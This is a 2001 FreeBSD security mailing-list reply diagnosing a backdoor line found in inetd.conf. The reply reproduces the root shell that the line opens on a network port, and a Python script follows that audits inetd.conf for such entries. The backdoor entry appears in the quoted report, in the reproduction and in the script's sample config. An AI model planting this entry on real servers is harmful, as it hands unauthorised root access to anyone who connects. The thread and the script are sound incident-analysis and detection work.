Date: Thu, 1 Nov 2001 16:05:16 +0100 (CET)
From: Krzysztof Zaraska <kzaraska@student.uci.agh.edu.pl>
To: Ralph Huntington <rjh@mohawk.net>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: strange inetd.conf entry
Message-ID: <Pine.BSF.4.21.0111011557040.551-100000@lhotse.zaraska.dhs.org>
In-Reply-To: <20011101093558.W79615-100000@mohegan.mohawk.net>
On Thu, 1 Nov 2001, Ralph Huntington wrote:

> I have that sinking feeling. I discovered this line at the end of
> inetd.conf on one of our servers:
>
> dlip stream tcp nowait root /bin/sh sh -i
>
> Looks like a root compromise. Sure enough, telnet'ing to the dlip port
> provides what *looks* like a root shell, but I don't seem to be able to do
> anything with it. Pretty mysterious.
>
> Can anyone offer a clue? Thanks in advance, Ralph

I've reproduced this on my machine. Yes, this is a functional rootshell,
albeit in a little strange manner... After telnetting to port 7201:

# touch /tmp/xxx ;
: not found
# ls -l /tmp ;
total 5
-rw-rw-rw-  1 kzaraska  wheel    3 Nov  1 15:54 .27405.145a7d
-rw-rw-rw-  1 kzaraska  wheel    3 Nov  1 15:54 .27405.366cf
drwxr-xr-x  2 root      wheel  512 Oct  7 22:08 install.554
drwxr-xr-x  2 root      wheel  512 Oct 14 08:39 install.92650
srwxrwxrwx  1 mysql     wheel    0 Nov  1 15:49 mysql.sock
drwx------  2 kzaraska  wheel  512 Sep  5 15:40 ntVQm8
-rw-r--r--  1 root      wheel    0 Aug 12 11:41 test
-rw-r--r--  1 root      wheel    0 Nov  1 15:59 xxx
: not found
# id ;
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
#

etc. ls itself does not seem to work, but ls -l ; does and so on... Guess
you'll have to experiment a little.

Anyhow, this definitely is a backdoor.

Krzysztof

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
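The entry Ralph found has the classic inetd backdoor shape: an unfamiliar service name, `root` as the user, and `/bin/sh` with `sh -i` as the server program, so anyone who connects to the port gets an interactive root shell. The script below is an added example, not code from the thread or from FreeBSD: it parses inetd.conf's `service socket-type protocol wait/nowait user program args` layout and flags entries that run an interpreter, request an interactive session, run a shell as root, or use a service name not found in a known-services table. The inetd.conf text and the `KNOWN_SERVICES` set are constructed for the example (a real audit would read `/etc/services` and the live `/etc/inetd.conf`); the `dlip` line is the one quoted above.

```python
"""Audit inetd.conf for entries that hand a shell to whoever connects.

Added example, not part of the original thread. The sample config and the
KNOWN_SERVICES table are constructed; a real scan would read /etc/inetd.conf
and /etc/services instead.
"""
import os
from typing import Dict, List, NamedTuple

# Interpreters that have no business being an inetd server program.
SHELL_PROGRAMS = {"sh", "bash", "csh", "tcsh", "ksh", "zsh", "perl", "python"}

# Constructed stand-in for the service names listed in /etc/services.
KNOWN_SERVICES = {"ftp", "telnet", "ssh", "finger", "comsat", "ntalk", "pop3", "auth"}


class InetdEntry(NamedTuple):
    service: str
    socket_type: str
    protocol: str
    wait: str
    user: str
    program: str
    args: List[str]
    lineno: int


def parse_inetd_conf(text: str) -> List[InetdEntry]:
    """Parse inetd.conf text into entries; comments and blank lines are skipped."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 6:
            continue  # malformed line; inetd would not start a server from it
        service, stype, proto, wait, user, program = fields[:6]
        wait = wait.split("/", 1)[0]                    # drop /max-child limits
        user = user.split(":", 1)[0].split("/", 1)[0]    # drop :group and /login-class
        entries.append(InetdEntry(service, stype, proto, wait, user, program, fields[6:], lineno))
    return entries


def audit_entry(entry: InetdEntry) -> List[str]:
    """Return the reasons an entry looks like a backdoor (empty list means clean)."""
    reasons = []
    base = os.path.basename(entry.program)
    if base in SHELL_PROGRAMS:
        reasons.append(f"server program is an interpreter ({entry.program})")
    if "-i" in entry.args:
        reasons.append("arguments request an interactive session (-i)")
    if entry.user == "root" and base in SHELL_PROGRAMS:
        reasons.append("shell would run as root")
    name = entry.service.split("/", 1)[0]  # rpc entries carry a /version suffix
    if entry.program != "internal" and not name.isdigit() and name not in KNOWN_SERVICES:
        reasons.append(f"service name {entry.service!r} is not a known service")
    return reasons


def audit_inetd_conf(text: str) -> Dict[int, List[str]]:
    """Map line number -> reasons for every entry that raised at least one flag."""
    findings = {}
    for entry in parse_inetd_conf(text):
        reasons = audit_entry(entry)
        if reasons:
            findings[entry.lineno] = reasons
    return findings


# Constructed sample; line 7 is the entry quoted in the thread.
SAMPLE_INETD_CONF = """\
# constructed sample inetd.conf
ftp     stream  tcp     nowait  root    /usr/libexec/ftpd       ftpd -l
telnet  stream  tcp     nowait  root    /usr/libexec/telnetd    telnetd
#finger stream  tcp     nowait/3/10 nobody /usr/libexec/fingerd fingerd -s
auth    stream  tcp     nowait  nobody  /usr/libexec/identd     identd -l -o
daytime stream  tcp     nowait  root    internal
dlip    stream  tcp     nowait  root    /bin/sh                 sh -i
"""

if __name__ == "__main__":
    for lineno, reasons in sorted(audit_inetd_conf(SAMPLE_INETD_CONF).items()):
        print(f"line {lineno}:")
        for reason in reasons:
            print(f"  - {reason}")
```

Run against the sample, only the `dlip` line is reported, with all four reasons. The unknown-service check is the one that catches renamed backdoors: inetd only binds a port for a name it can resolve, so an attacker who adds a service line must also add a matching `/etc/services` entry, and a diff of that file against a known-good copy is the natural companion to this script.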